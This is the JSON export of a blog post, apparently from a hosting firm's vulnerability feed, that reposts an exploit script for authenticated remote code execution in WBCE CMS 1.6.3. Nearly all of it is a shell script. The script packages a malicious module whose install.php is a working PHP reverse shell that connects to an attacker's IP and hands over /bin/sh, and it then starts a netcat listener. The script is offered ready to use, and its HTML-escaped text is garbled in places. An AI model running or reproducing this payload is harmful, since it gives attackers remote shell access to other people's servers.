{"id":62589,"date":"2025-04-09T02:52:42","date_gmt":"2025-04-08T23:22:42","guid":{"rendered":"https:\/\/afaghhosting.net\/blog\/wbce-cms-1-6-3-authenticated-remote-code-execution-rce\/"},"modified":"2025-04-09T02:52:42","modified_gmt":"2025-04-08T23:22:42","slug":"wbce-cms-1-6-3-authenticated-remote-code-execution-rce","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wbce-cms-1-6-3-authenticated-remote-code-execution-rce\/","title":{"rendered":"WBCE CMS 1.6.3 &#8211; Authenticated Remote Code Execution (RCE)"},"content":{"rendered":"<p><\/p>\n<div>\n<pre><code class=\"language-sh\" style=\"white-space: pre-wrap;\"># Exploit Title: WBCE CMS  <lport>\"&#13;\n\texit 1&#13;\nfi&#13;\n&#13;\nif [ -z \"$(which nc)\" ]; then&#13;\n\techo \"[!] Netcat is not installed.\"&#13;\n\texit 1 &#13;\nfi&#13;\n&#13;\nip=$1&#13;\nport=$2&#13;\n&#13;\nrm -rf shellModule.zip&#13;\nrm -rf shellModule&#13;\nmkdir shellModule&#13;\n&#13;\necho [*] Crafting Payload&#13;\n&#13;\ncat  shellModule\/info.php&#13;\n<?php \/**\n *\n * @category        modules\n * @package         Reverse Shell\n * @author          Swammers8\n * @link                        https:\/\/swammers8.github.io\/\n * @license         http:\/\/www.gnu.org\/licenses\/gpl.html\n * @platform        example.com\n * @requirements    PHP 5.6 and higher\n * @version         1.3.3.7\n * @lastmodified    May 22 2025\n *\n *\n *\/\n\n\\$module_directory               = &#039;modshell&#039;;\n\\$module_name                    = &#039;Reverse Shell&#039;;\n\\$module_function                = &#039;page&#039;;\n\\$module_version                 = &#039;1.3.3.7&#039;;\n\\$module_platform                = &#039;2.10.x&#039;;\n\n\\$module_author                  = &#039;Swammers8&#039;;\n\\$module_license                 = &#039;GNU General Public License&#039;;\n\\$module_description     = &#039;This module is a backdoor&#039;;\n\n??>&#13;\nEOF&#13;\n&#13;\ncat  shellModule\/install.php&#13;\n<?php set_time_limit (0);\n\\$VERSION = &quot;1.0&quot;;\n\\$ip = &#039;$ip&#039;;  \/\/ CHANGE THIS\n\\$port = $port;       \/\/ CHANGE THIS\n\\$chunk_size = 1400;\n\\$write_a = null;\n\\$error_a = null;\n\\$shell = &#039;uname -a; w; id; \/bin\/sh -i&#039;;\n\\$daemon = 0;\n\\$debug = 0;\n\nif (function_exists(&#039;pcntl_fork&#039;)) {\n\t\\$pid = pcntl_fork();\n\tif (\\$pid == -1) {\n\t\tprintit(&quot;ERROR: Can&#039;t fork&quot;);\n\t\texit(1);\n\t}\n\t\n\tif (\\$pid) {\n\t\texit(0);  \/\/ Parent exits\n\t}\n\n\tif (posix_setsid() == -1) {\n\t\tprintit(&quot;Error: Can&#039;t setsid()&quot;);\n\t\texit(1);\n\t}\n\n\t\\$daemon = 1;\n} else {\n\tprintit(&quot;WARNING: Failed to daemonise.  This is quite common and not fatal.&quot;);\n}\n\nchdir(&quot;\/&quot;);\n\numask(0);\n\n\n\\$sock = fsockopen(\\$ip, \\$port, \\$errno, \\$errstr, 30);\nif (!\\$sock) {\n\tprintit(&quot;\\$errstr (\\$errno)&quot;);\n\texit(1);\n}\n\n\\$descriptorspec = array(\n   0 =?> array(\"pipe\", \"r\"),  \/\/ stdin is a pipe that the child will read from&#13;\n   1 =&gt; array(\"pipe\", \"w\"),  \/\/ stdout is a pipe that the child will write to&#13;\n   2 =&gt; array(\"pipe\", \"w\")   \/\/ stderr is a pipe that the child will write to&#13;\n);&#13;\n&#13;\n\\$process = proc_open(\\$shell, \\$descriptorspec, \\$pipes);&#13;\n&#13;\nif (!is_resource(\\$process)) {&#13;\n\tprintit(\"ERROR: Can't spawn shell\");&#13;\n\texit(1);&#13;\n}&#13;\n&#13;\nstream_set_blocking(\\$pipes[0], 0);&#13;\nstream_set_blocking(\\$pipes[1], 0);&#13;\nstream_set_blocking(\\$pipes[2], 0);&#13;\nstream_set_blocking(\\$sock, 0);&#13;\n&#13;\nprintit(\"Successfully opened reverse shell to \\$ip:\\$port\");&#13;\n&#13;\nwhile (1) {&#13;\n\tif (feof(\\$sock)) {&#13;\n\t\tprintit(\"ERROR: Shell connection terminated\");&#13;\n\t\tbreak;&#13;\n\t}&#13;\n&#13;\n\tif (feof(\\$pipes[1])) {&#13;\n\t\tprintit(\"ERROR: Shell process terminated\");&#13;\n\t\tbreak;&#13;\n\t}&#13;\n&#13;\n\t\\$read_a = array(\\$sock, \\$pipes[1], \\$pipes[2]);&#13;\n\t\\$num_changed_sockets = stream_select(\\$read_a, \\$write_a, \\$error_a, null);&#13;\n&#13;\n\tif (in_array(\\$sock, \\$read_a)) {&#13;\n\t\tif (\\$debug) printit(\"SOCK READ\");&#13;\n\t\t\\$input = fread(\\$sock, \\$chunk_size);&#13;\n\t\tif (\\$debug) printit(\"SOCK: \\$input\");&#13;\n\t\tfwrite(\\$pipes[0], \\$input);&#13;\n\t}&#13;\n&#13;\n\tif (in_array(\\$pipes[1], \\$read_a)) {&#13;\n\t\tif (\\$debug) printit(\"STDOUT READ\");&#13;\n\t\t\\$input = fread(\\$pipes[1], \\$chunk_size);&#13;\n\t\tif (\\$debug) printit(\"STDOUT: \\$input\");&#13;\n\t\tfwrite(\\$sock, \\$input);&#13;\n\t}&#13;\n&#13;\n\tif (in_array(\\$pipes[2], \\$read_a)) {&#13;\n\t\tif (\\$debug) printit(\"STDERR READ\");&#13;\n\t\t\\$input = fread(\\$pipes[2], \\$chunk_size);&#13;\n\t\tif (\\$debug) printit(\"STDERR: \\$input\");&#13;\n\t\tfwrite(\\$sock, \\$input);&#13;\n\t}&#13;\n}&#13;\n&#13;\nfclose(\\$sock);&#13;\nfclose(\\$pipes[0]);&#13;\nfclose(\\$pipes[1]);&#13;\nfclose(\\$pipes[2]);&#13;\nproc_close(\\$process);&#13;\n&#13;\nfunction printit (\\$string) {&#13;\n\tif (!\\$daemon) {&#13;\n\t\tprint \"\\$string\\n\";&#13;\n\t}&#13;\n}&#13;\n&#13;\n?&gt; &#13;\nEOF&#13;\n&#13;\necho [*] Zipping to shellModule.zip&#13;\nzip -r shellModule.zip shellModule&#13;\nrm -rf shellModule&#13;\necho [*] Please login to the WBCE admin panel to upload and install the module&#13;\necho [*] Starting listener&#13;\n&#13;\nnc -lvnp $port&#13;\n&#13;\necho&#13;\necho&#13;\necho \"[*] Done!\"&#13;\necho \"[*] Make sure to uninstall the module named 'Reverse Shell' in the module page\"\n            <\/lport><\/code><\/pre>\n<\/p><\/div>\n<p><a href=\"https:\/\/afaghhosting.net]\">\u0622\u0641\u0627\u0642 \u0647\u0627\u0633\u062a\u06cc\u0646\u06af \u0645\u062f\u06cc\u0631\u06cc\u062a \u0633\u0631\u0648\u0631 \u0645\u0634\u0627\u0648\u0631 \u0648 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0641\u0646\u06cc <\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p># Exploit Title: WBCE CMS &#8220;&#13; exit 1&#13; fi&#13; &#13; if [ -z &#8220;$(which nc)&#8221; ]; then&#13; echo &#8220;[!] Netcat is not installed.&#8221;&#13; exit 1 &#13; fi&#13; &#13; ip=$1&#13; port=$2&#13; &#13; rm -rf shellModule.zip&#13; rm -rf shellModule&#13; mkdir shellModule&#13; &#13; echo [*] Crafting Payload&#13; &#13; cat shellModule\/info.php&#13; &#13; EOF&#13; &#13; cat shellModule\/install.php&#13;<\/p>\n","protected":false},"author":1,"featured_media":62562,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-62589","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62589","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=62589"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/62589\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media\/62562"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=62589"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=62589"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=62589"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}